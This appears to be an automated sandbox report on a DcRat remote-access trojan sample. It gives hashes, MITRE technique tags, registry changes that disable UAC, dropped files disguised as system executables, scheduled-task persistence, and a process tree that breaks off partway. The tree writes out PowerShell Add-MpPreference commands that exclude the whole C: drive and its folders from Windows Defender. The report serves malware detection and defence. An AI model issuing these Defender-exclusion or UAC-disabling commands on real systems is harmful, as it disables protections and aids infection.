dcrat | 43f8b28bff64dc200d51657f0f0aafd27125f9489e7c06fc109a22e58eadebc3

Analysis

max time kernel
119s
max time network
119s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
12/09/2024, 14:16 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

443110dabe7095bf8afe27bf3dc27f60N.exe
Size

4.9MB
MD5

443110dabe7095bf8afe27bf3dc27f60
SHA1

03554dc5583fd4d38124bf4f65405faadf61543e
SHA256

43f8b28bff64dc200d51657f0f0aafd27125f9489e7c06fc109a22e58eadebc3
SHA512

aca75451bf62ffa71190bcac77606c1dae1edf9813ded3443c2a5f6535a71ee2809bbf3889e31b40cc9dcccf85675e67be9103329e6e7566b157f2b004da5070
SSDEEP

49152:rl5MTGChZpxtlBBgxchXb/zqP6DUtRgs5q289dAnSz44hnW1XgnYu6fYmPkMSx8E:

Score

10^/10

dcrat evasion execution infostealer rat trojan

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Process spawned unexpected child process 15 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2736	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2960	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1792	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2112	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2916	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2040	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2652	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2552	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2584	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3044	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2180	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1992	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2920	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3056	2740	schtasks.exe	29
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	2740	schtasks.exe	29

UAC bypass 3 TTPs 27 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/984-3-0x000000001B520000-0x000000001B64E000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2904	powershell.exe
2784	powershell.exe
2848	powershell.exe
1968	powershell.exe
2824	powershell.exe
2628	powershell.exe
1392	powershell.exe
1384	powershell.exe
2928	powershell.exe
2844	powershell.exe
2328	powershell.exe
2896	powershell.exe

Executes dropped EXE 8 IoCs

pid	Process
2240	sppsvc.exe
2440	sppsvc.exe
2812	sppsvc.exe
2128	sppsvc.exe
2352	sppsvc.exe
3036	sppsvc.exe
1312	sppsvc.exe
2036	sppsvc.exe

Checks whether UAC is enabled 1 TTPs 18 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	443110dabe7095bf8afe27bf3dc27f60N.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	sppsvc.exe

Drops file in Program Files directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Windows NT\Accessories\it-IT\RCX2E44.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files\Windows NT\Accessories\it-IT\System.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\RCX32B9.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\Windows NT\Accessories\it-IT\System.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files\Windows NT\Accessories\it-IT\27d1bcfc3c54e0	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\0a1fd5f707cd16	443110dabe7095bf8afe27bf3dc27f60N.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\addins\6ccacd8608530f	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\inf\de-DE\RCX3086.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\inf\de-DE\wininit.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\addins\RCX34DC.tmp	443110dabe7095bf8afe27bf3dc27f60N.exe
File opened for modification	C:\Windows\addins\Idle.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\inf\de-DE\wininit.exe	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\inf\de-DE\56085415360792	443110dabe7095bf8afe27bf3dc27f60N.exe
File created	C:\Windows\addins\Idle.exe	443110dabe7095bf8afe27bf3dc27f60N.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 15 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2040	schtasks.exe
2652	schtasks.exe
2552	schtasks.exe
3044	schtasks.exe
2172	schtasks.exe
1792	schtasks.exe
2112	schtasks.exe
2916	schtasks.exe
2180	schtasks.exe
3056	schtasks.exe
2736	schtasks.exe
2960	schtasks.exe
1992	schtasks.exe
2920	schtasks.exe
2584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
984	443110dabe7095bf8afe27bf3dc27f60N.exe
1392	powershell.exe
2848	powershell.exe
2824	powershell.exe
2784	powershell.exe
2896	powershell.exe
2904	powershell.exe
1968	powershell.exe
1384	powershell.exe
2844	powershell.exe
2928	powershell.exe
2328	powershell.exe
2628	powershell.exe
2240	sppsvc.exe
2440	sppsvc.exe
2812	sppsvc.exe
2128	sppsvc.exe
2352	sppsvc.exe
3036	sppsvc.exe
1312	sppsvc.exe
2036	sppsvc.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

description	pid	Process
Token: SeDebugPrivilege	984	443110dabe7095bf8afe27bf3dc27f60N.exe
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1968	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	2844	powershell.exe
Token: SeDebugPrivilege	2928	powershell.exe
Token: SeDebugPrivilege	2328	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	2240	sppsvc.exe
Token: SeDebugPrivilege	2440	sppsvc.exe
Token: SeDebugPrivilege	2812	sppsvc.exe
Token: SeDebugPrivilege	2128	sppsvc.exe
Token: SeDebugPrivilege	2352	sppsvc.exe
Token: SeDebugPrivilege	3036	sppsvc.exe
Token: SeDebugPrivilege	1312	sppsvc.exe
Token: SeDebugPrivilege	2036	sppsvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 984 wrote to memory of 1392	984	443110dabe7095bf8afe27bf3dc27f60N.exe	45
PID 984 wrote to memory of 1392	984	443110dabe7095bf8afe27bf3dc27f60N.exe	45
PID 984 wrote to memory of 1392	984	443110dabe7095bf8afe27bf3dc27f60N.exe	45
PID 984 wrote to memory of 1384	984	443110dabe7095bf8afe27bf3dc27f60N.exe	46
PID 984 wrote to memory of 1384	984	443110dabe7095bf8afe27bf3dc27f60N.exe	46
PID 984 wrote to memory of 1384	984	443110dabe7095bf8afe27bf3dc27f60N.exe	46
PID 984 wrote to memory of 2904	984	443110dabe7095bf8afe27bf3dc27f60N.exe	48
PID 984 wrote to memory of 2904	984	443110dabe7095bf8afe27bf3dc27f60N.exe	48
PID 984 wrote to memory of 2904	984	443110dabe7095bf8afe27bf3dc27f60N.exe	48
PID 984 wrote to memory of 2784	984	443110dabe7095bf8afe27bf3dc27f60N.exe	49
PID 984 wrote to memory of 2784	984	443110dabe7095bf8afe27bf3dc27f60N.exe	49
PID 984 wrote to memory of 2784	984	443110dabe7095bf8afe27bf3dc27f60N.exe	49
PID 984 wrote to memory of 2896	984	443110dabe7095bf8afe27bf3dc27f60N.exe	50
PID 984 wrote to memory of 2896	984	443110dabe7095bf8afe27bf3dc27f60N.exe	50
PID 984 wrote to memory of 2896	984	443110dabe7095bf8afe27bf3dc27f60N.exe	50
PID 984 wrote to memory of 2928	984	443110dabe7095bf8afe27bf3dc27f60N.exe	51
PID 984 wrote to memory of 2928	984	443110dabe7095bf8afe27bf3dc27f60N.exe	51
PID 984 wrote to memory of 2928	984	443110dabe7095bf8afe27bf3dc27f60N.exe	51
PID 984 wrote to memory of 2844	984	443110dabe7095bf8afe27bf3dc27f60N.exe	52
PID 984 wrote to memory of 2844	984	443110dabe7095bf8afe27bf3dc27f60N.exe	52
PID 984 wrote to memory of 2844	984	443110dabe7095bf8afe27bf3dc27f60N.exe	52
PID 984 wrote to memory of 2328	984	443110dabe7095bf8afe27bf3dc27f60N.exe	53
PID 984 wrote to memory of 2328	984	443110dabe7095bf8afe27bf3dc27f60N.exe	53
PID 984 wrote to memory of 2328	984	443110dabe7095bf8afe27bf3dc27f60N.exe	53
PID 984 wrote to memory of 2628	984	443110dabe7095bf8afe27bf3dc27f60N.exe	54
PID 984 wrote to memory of 2628	984	443110dabe7095bf8afe27bf3dc27f60N.exe	54
PID 984 wrote to memory of 2628	984	443110dabe7095bf8afe27bf3dc27f60N.exe	54
PID 984 wrote to memory of 2848	984	443110dabe7095bf8afe27bf3dc27f60N.exe	55
PID 984 wrote to memory of 2848	984	443110dabe7095bf8afe27bf3dc27f60N.exe	55
PID 984 wrote to memory of 2848	984	443110dabe7095bf8afe27bf3dc27f60N.exe	55
PID 984 wrote to memory of 2824	984	443110dabe7095bf8afe27bf3dc27f60N.exe	56
PID 984 wrote to memory of 2824	984	443110dabe7095bf8afe27bf3dc27f60N.exe	56
PID 984 wrote to memory of 2824	984	443110dabe7095bf8afe27bf3dc27f60N.exe	56
PID 984 wrote to memory of 1968	984	443110dabe7095bf8afe27bf3dc27f60N.exe	57
PID 984 wrote to memory of 1968	984	443110dabe7095bf8afe27bf3dc27f60N.exe	57
PID 984 wrote to memory of 1968	984	443110dabe7095bf8afe27bf3dc27f60N.exe	57
PID 984 wrote to memory of 2240	984	443110dabe7095bf8afe27bf3dc27f60N.exe	69
PID 984 wrote to memory of 2240	984	443110dabe7095bf8afe27bf3dc27f60N.exe	69
PID 984 wrote to memory of 2240	984	443110dabe7095bf8afe27bf3dc27f60N.exe	69
PID 984 wrote to memory of 2240	984	443110dabe7095bf8afe27bf3dc27f60N.exe	69
PID 984 wrote to memory of 2240	984	443110dabe7095bf8afe27bf3dc27f60N.exe	69
PID 2240 wrote to memory of 2600	2240	sppsvc.exe	70
PID 2240 wrote to memory of 2600	2240	sppsvc.exe	70
PID 2240 wrote to memory of 2600	2240	sppsvc.exe	70
PID 2240 wrote to memory of 2920	2240	sppsvc.exe	71
PID 2240 wrote to memory of 2920	2240	sppsvc.exe	71
PID 2240 wrote to memory of 2920	2240	sppsvc.exe	71
PID 2600 wrote to memory of 2440	2600	WScript.exe	72
PID 2600 wrote to memory of 2440	2600	WScript.exe	72
PID 2600 wrote to memory of 2440	2600	WScript.exe	72
PID 2600 wrote to memory of 2440	2600	WScript.exe	72
PID 2600 wrote to memory of 2440	2600	WScript.exe	72
PID 2440 wrote to memory of 960	2440	sppsvc.exe	73
PID 2440 wrote to memory of 960	2440	sppsvc.exe	73
PID 2440 wrote to memory of 960	2440	sppsvc.exe	73
PID 2440 wrote to memory of 2232	2440	sppsvc.exe	74
PID 2440 wrote to memory of 2232	2440	sppsvc.exe	74
PID 2440 wrote to memory of 2232	2440	sppsvc.exe	74
PID 960 wrote to memory of 2812	960	WScript.exe	75
PID 960 wrote to memory of 2812	960	WScript.exe	75
PID 960 wrote to memory of 2812	960	WScript.exe	75
PID 960 wrote to memory of 2812	960	WScript.exe	75
PID 960 wrote to memory of 2812	960	WScript.exe	75
PID 2812 wrote to memory of 1548	2812	sppsvc.exe	76

System policy modification 1 TTPs 27 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	443110dabe7095bf8afe27bf3dc27f60N.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	sppsvc.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	sppsvc.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\443110dabe7095bf8afe27bf3dc27f60N.exe
"C:\Users\Admin\AppData\Local\Temp\443110dabe7095bf8afe27bf3dc27f60N.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:984
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2784
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2896
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2928
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2844
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2328
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2628
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2824
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1968
- C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
  "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
  2⤵
  - UAC bypass
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2240
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\60e7b06c-4491-447c-95fc-4642800edf96.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2600
  - - C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe
      "C:\Program Files (x86)\Microsoft Synchronization Services\ADO.NET\v1.0\sppsvc.exe"
      4⤵
      UAC bypass
      Executes dropped EXE
